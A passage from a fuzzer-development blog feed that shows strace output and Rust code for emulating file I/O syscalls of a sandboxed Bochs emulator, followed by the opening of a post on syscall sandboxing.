mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
</span><span class="c">...
</span></code></pre></div></div>

<h2 id="file-io">File I/O</h2>
<p>With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
</span><span class="gp">read(3, "#</span><span class="w"> </span>You may now use double quotes <span class="s2">"..., 1024) = 1024
</span><span class="go">read(3, "================================"..., 1024) = 1024
</span><span class="gp">read(3, "ig_interface: win32config\n#</span>confi<span class="s2">"..., 1024) = 1024
</span><span class="go">read(3, "ace to AT&amp;T's VNC viewer, cross "..., 1024) = 1024
</span></code></pre></div></div>

<p>The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages: I can imagine a future where we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to already have that file read into memory and ready to use. Emulating the file I/O syscalls then becomes very straightforward; we really only need to keep a little metadata and the file contents themselves:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">FileTable</span> <span class="p">{</span>
    <span class="n">files</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">File</span><span class="o">&gt;</span><span class="p">,</span>
<span class="p">}</span>

<span class="k">impl</span> <span class="n">FileTable</span> <span class="p">{</span>
    <span class="c1">// We will attempt to open and read all of our required files ahead of time</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">new</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Retrieve .bochsrc</span>
        <span class="k">let</span> <span class="n">args</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">env</span><span class="p">::</span><span class="nf">args</span><span class="p">()</span><span class="nf">.collect</span><span class="p">();</span>

        <span class="c1">// Check to see if we have a "--bochsrc-path" argument</span>
        <span class="k">if</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">&lt;</span> <span class="mi">3</span> <span class="p">||</span> <span class="o">!</span><span class="n">args</span><span class="nf">.contains</span><span class="p">(</span><span class="o">&amp;</span><span class="s">"--bochsrc-path"</span><span class="nf">.to_string</span><span class="p">())</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"No `--bochsrc-path` argument"</span><span class="p">));</span>
        <span class="p">}</span>

        <span class="c1">// Search for the value</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">bochsrc</span> <span class="o">=</span> <span class="nb">None</span><span class="p">;</span>
        <span class="k">for</span> <span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">arg</span><span class="p">)</span> <span class="k">in</span> <span class="n">args</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.enumerate</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">arg</span> <span class="o">==</span> <span class="s">"--bochsrc-path"</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">i</span> <span class="o">&gt;=</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="mi">1</span> <span class="p">{</span>
                    <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span>
                        <span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Invalid `--bochsrc-path` value"</span><span class="p">));</span>
                <span class="p">}</span>
            
                <span class="n">bochsrc</span> <span class="o">=</span> <span class="nf">Some</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span><span class="nf">.clone</span><span class="p">());</span>
                <span class="k">break</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">bochsrc</span><span class="nf">.is_none</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span>
            <span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"No `--bochsrc-path` value provided"</span><span class="p">));</span> <span class="p">}</span>
        <span class="k">let</span> <span class="n">bochsrc</span> <span class="o">=</span> <span class="n">bochsrc</span><span class="nf">.unwrap</span><span class="p">();</span>

        <span class="c1">// Try to read the file</span>
        <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">=</span> <span class="nf">read</span><span class="p">(</span><span class="o">&amp;</span><span class="n">bochsrc</span><span class="p">)</span> <span class="k">else</span> <span class="p">{</span> 
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Unable to read data BLEGH from '{}'"</span><span class="p">,</span> <span class="n">bochsrc</span><span class="p">)));</span>
        <span class="p">};</span>

        <span class="c1">// Create a file now for .bochsrc</span>
        <span class="k">let</span> <span class="n">bochsrc_file</span> <span class="o">=</span> <span class="n">File</span> <span class="p">{</span>
            <span class="n">fd</span><span class="p">:</span> <span class="mi">3</span><span class="p">,</span>
            <span class="n">path</span><span class="p">:</span> <span class="s">".bochsrc"</span><span class="nf">.to_string</span><span class="p">(),</span>
            <span class="n">contents</span><span class="p">:</span> <span class="n">data</span><span class="nf">.clone</span><span class="p">(),</span>
            <span class="n">cursor</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">};</span>

        <span class="c1">// Insert the file into the FileTable</span>
        <span class="nf">Ok</span><span class="p">(</span><span class="n">FileTable</span> <span class="p">{</span>
            <span class="n">files</span><span class="p">:</span> <span class="nd">vec!</span><span class="p">[</span><span class="n">bochsrc_file</span><span class="p">],</span>
        <span class="p">})</span>
    <span class="p">}</span>

    <span class="c1">// Attempt to open a file</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">open</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">path</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">i32</span><span class="p">,</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Try to find the requested path</span>
        <span class="k">for</span> <span class="n">file</span> <span class="k">in</span> <span class="k">self</span><span class="py">.files</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">file</span><span class="py">.path</span> <span class="o">==</span> <span class="n">path</span> <span class="p">{</span>
                <span class="k">return</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">file</span><span class="py">.fd</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="c1">// We didn't find the file, this really should never happen?</span>
        <span class="nf">Err</span><span class="p">(())</span>
    <span class="p">}</span>

    <span class="c1">// Look a file up by fd and then return a mutable reference to it</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">get_file</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">fd</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Option</span><span class="o">&lt;&amp;</span><span class="k">mut</span> <span class="n">File</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="k">self</span><span class="py">.files</span><span class="nf">.iter_mut</span><span class="p">()</span><span class="nf">.find</span><span class="p">(|</span><span class="n">file</span><span class="p">|</span> <span class="n">file</span><span class="py">.fd</span> <span class="o">==</span> <span class="n">fd</span><span class="p">)</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">File</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">fd</span><span class="p">:</span> <span class="nb">i32</span><span class="p">,</span>            <span class="c1">// The file-descriptor Bochs has for this file</span>
    <span class="k">pub</span> <span class="n">path</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span>       <span class="c1">// The file-path for this file</span>
    <span class="k">pub</span> <span class="n">contents</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span>  <span class="c1">// The actual file contents</span>
    <span class="k">pub</span> <span class="n">cursor</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>      <span class="c1">// The current cursor in the file</span>
<span class="p">}</span>
</code></pre></div></div>
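
<p>As an aside, the search for the <code class="language-plaintext highlighter-rouge">--bochsrc-path</code> value could be written more compactly with iterator helpers. This is only a sketch: <code class="language-plaintext highlighter-rouge">arg_value</code> is a hypothetical helper that is not part of Lucid, the path in the example is made up, and it collapses the separate “flag missing” and “value missing” errors into a single <code class="language-plaintext highlighter-rouge">None</code>:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Hypothetical helper: returns the argument that follows `flag`, if any
fn arg_value&lt;'a&gt;(args: &amp;'a [String], flag: &amp;str) -&gt; Option&lt;&amp;'a str&gt; {
    // Find the index of the flag itself
    let idx = args.iter().position(|arg| arg.as_str() == flag)?;

    // The value is whatever comes next; `get` returns None at the end
    args.get(idx + 1).map(|value| value.as_str())
}

fn main() {
    // Made-up command line for illustration
    let args: Vec&lt;String&gt; = ["lucid", "--bochsrc-path", "/tmp/.bochsrc"]
        .iter()
        .map(|s| s.to_string())
        .collect();
    assert_eq!(arg_value(&amp;args, "--bochsrc-path"), Some("/tmp/.bochsrc"));

    // Flag present but no value after it
    let args: Vec&lt;String&gt; = ["lucid", "--bochsrc-path"]
        .iter()
        .map(|s| s.to_string())
        .collect();
    assert_eq!(arg_value(&amp;args, "--bochsrc-path"), None);
}
</code></pre></div></div>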

<p>So when Bochs asks to <code class="language-plaintext highlighter-rouge">read</code> a file and provides the <code class="language-plaintext highlighter-rouge">fd</code>, we look up the matching file in the <code class="language-plaintext highlighter-rouge">FileTable</code>, copy its contents out of the <code class="language-plaintext highlighter-rouge">File::contents</code> buffer, and then update the <code class="language-plaintext highlighter-rouge">cursor</code> struct member to keep track of our current offset in the file:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// read</span>
        <span class="mi">0x0</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Check to make sure we have the requested file-descriptor</span>
            <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="o">=</span> <span class="n">context</span><span class="py">.files</span><span class="nf">.get_file</span><span class="p">(</span><span class="n">a1</span> <span class="k">as</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">else</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Non-existent file fd: {}"</span><span class="p">,</span> <span class="n">a1</span><span class="p">);</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">NoFile</span><span class="p">);</span>
            <span class="p">};</span>

            <span class="c1">// Now we need to make sure the buffer passed to read isn't NULL</span>
            <span class="k">let</span> <span class="n">buf_p</span> <span class="o">=</span> <span class="n">a2</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">;</span>
            <span class="k">if</span> <span class="n">buf_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="n">context</span><span class="py">.tls.errno</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">EINVAL</span><span class="p">;</span>
                <span class="k">return</span> <span class="o">-</span><span class="mi">1_i64</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Adjust read size if necessary</span>
            <span class="k">let</span> <span class="n">length</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">cmp</span><span class="p">::</span><span class="nf">min</span><span class="p">(</span><span class="n">a3</span><span class="p">,</span> <span class="n">file</span><span class="py">.contents</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">file</span><span class="py">.cursor</span><span class="p">);</span>

            <span class="c1">// Copy the contents over to the buffer</span>
            <span class="k">unsafe</span> <span class="p">{</span> 
                <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">copy</span><span class="p">(</span>
                    <span class="n">file</span><span class="py">.contents</span><span class="nf">.as_ptr</span><span class="p">()</span><span class="nf">.add</span><span class="p">(</span><span class="n">file</span><span class="py">.cursor</span><span class="p">),</span>    <span class="c1">// src</span>
                    <span class="n">buf_p</span><span class="p">,</span>                                      <span class="c1">// dst</span>
                    <span class="n">length</span><span class="p">);</span>                                    <span class="c1">// len</span>
            <span class="p">}</span>

            <span class="c1">// Adjust the file cursor</span>
            <span class="n">file</span><span class="py">.cursor</span> <span class="o">+=</span> <span class="n">length</span><span class="p">;</span>

            <span class="c1">// Success</span>
            <span class="n">length</span> <span class="k">as</span> <span class="nb">u64</span>
        <span class="p">},</span>
</code></pre></div></div>
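
<p>The cursor behavior is easiest to see in isolation. Below is a minimal sketch with a trimmed-down, hypothetical <code class="language-plaintext highlighter-rouge">File</code> that only keeps <code class="language-plaintext highlighter-rouge">contents</code> and <code class="language-plaintext highlighter-rouge">cursor</code>, and that copies into a safe slice instead of the raw pointer Bochs hands to the syscall handler. It shows the short read at the end of the file and the zero-length read once the cursor hits EOF:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Hypothetical, trimmed-down version of `File` with only what `read` needs
struct File {
    contents: Vec&lt;u8&gt;,
    cursor: usize,
}

impl File {
    // Copy up to `buf.len()` bytes starting at the cursor, then advance it
    fn read(&amp;mut self, buf: &amp;mut [u8]) -&gt; usize {
        // Adjust read size if fewer bytes remain than were requested
        let length = std::cmp::min(buf.len(), self.contents.len() - self.cursor);

        // Copy the contents over to the buffer
        let end = self.cursor + length;
        buf[..length].copy_from_slice(&amp;self.contents[self.cursor..end]);

        // Adjust the file cursor
        self.cursor += length;
        length
    }
}

fn main() {
    let mut file = File {
        contents: b"0123456789".to_vec(),
        cursor: 0,
    };
    let mut buf = [0u8; 4];

    // Two full reads of four bytes each
    assert_eq!(file.read(&amp;mut buf), 4);
    assert_eq!(&amp;buf, b"0123");
    assert_eq!(file.read(&amp;mut buf), 4);
    assert_eq!(&amp;buf, b"4567");

    // Only two bytes remain, so this is a short read
    assert_eq!(file.read(&amp;mut buf), 2);
    assert_eq!(&amp;buf[..2], b"89");

    // The cursor is at EOF, so further reads return 0
    assert_eq!(file.read(&amp;mut buf), 0);
}
</code></pre></div></div>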

<p><code class="language-plaintext highlighter-rouge">open</code> calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// open</span>
        <span class="mi">0x2</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Get pointer to path string we're trying to open</span>
            <span class="k">let</span> <span class="n">path_p</span> <span class="o">=</span> <span class="n">a1</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_char</span><span class="p">;</span>

            <span class="c1">// Make sure it's not NULL</span>
            <span class="k">if</span> <span class="n">path_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">NullPath</span><span class="p">);</span>
            <span class="p">}</span>            

            <span class="c1">// Create c_str from pointer</span>
            <span class="k">let</span> <span class="n">c_str</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nn">CStr</span><span class="p">::</span><span class="nf">from_ptr</span><span class="p">(</span><span class="n">path_p</span><span class="p">)</span> <span class="p">};</span>

            <span class="c1">// Create Rust str from c_str</span>
            <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">path_str</span><span class="p">)</span> <span class="o">=</span> <span class="n">c_str</span><span class="nf">.to_str</span><span class="p">()</span> <span class="k">else</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">InvalidPathStr</span><span class="p">);</span>
            <span class="p">};</span>

            <span class="c1">// Validate permissions</span>
            <span class="k">if</span> <span class="n">a2</span> <span class="k">as</span> <span class="nb">i32</span> <span class="o">!=</span> <span class="mi">32768</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled file permissions: {}"</span><span class="p">,</span> <span class="n">a2</span><span class="p">);</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">Syscall</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// Open the file</span>
            <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">context</span><span class="py">.files</span><span class="nf">.open</span><span class="p">(</span><span class="n">path_str</span><span class="p">);</span>
            <span class="k">if</span> <span class="n">fd</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Non-existent file path: {}"</span><span class="p">,</span> <span class="n">path_str</span><span class="p">);</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">NoFile</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// Success</span>
            <span class="n">fd</span><span class="nf">.unwrap</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span>
        <span class="p">},</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Attempt to open a file</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">open</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">path</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">i32</span><span class="p">,</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Try to find the requested path</span>
        <span class="k">for</span> <span class="n">file</span> <span class="k">in</span> <span class="k">self</span><span class="py">.files</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">file</span><span class="py">.path</span> <span class="o">==</span> <span class="n">path</span> <span class="p">{</span>
                <span class="k">return</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">file</span><span class="py">.fd</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="c1">// We didn't find the file</span>
        <span class="nf">Err</span><span class="p">(())</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>And that’s really the whole of file I/O right now. Down the line, we’ll need to keep this file state in mind when we’re taking and resetting snapshots, because it will need to be restored differentially, but this is a problem for another day.</p>

<h2 id="conclusion">Conclusion</h2>
<p>The work continues on the fuzzer and I’m still having a blast implementing it. Special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program such that we can snapshot and fuzz appropriately. That should be really fun, until then!</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Background]]></summary></entry><entry><title type="html">Fuzzer Development 2: Sandboxing Syscalls</title><link href="https://h0mbre.github.io/Lucid_Context_Switching/" rel="alternate" type="text/html" title="Fuzzer Development 2: Sandboxing Syscalls" /><published>2024-02-17T00:00:00+00:00</published><updated>2024-02-17T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Context_Switching</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Context_Switching/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up <a href="https://h0mbre.github.io/New_Fuzzer_Project/">here</a>. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it this way: we were too lazy to implement our own x86_64 emulator from scratch, so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else are just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from 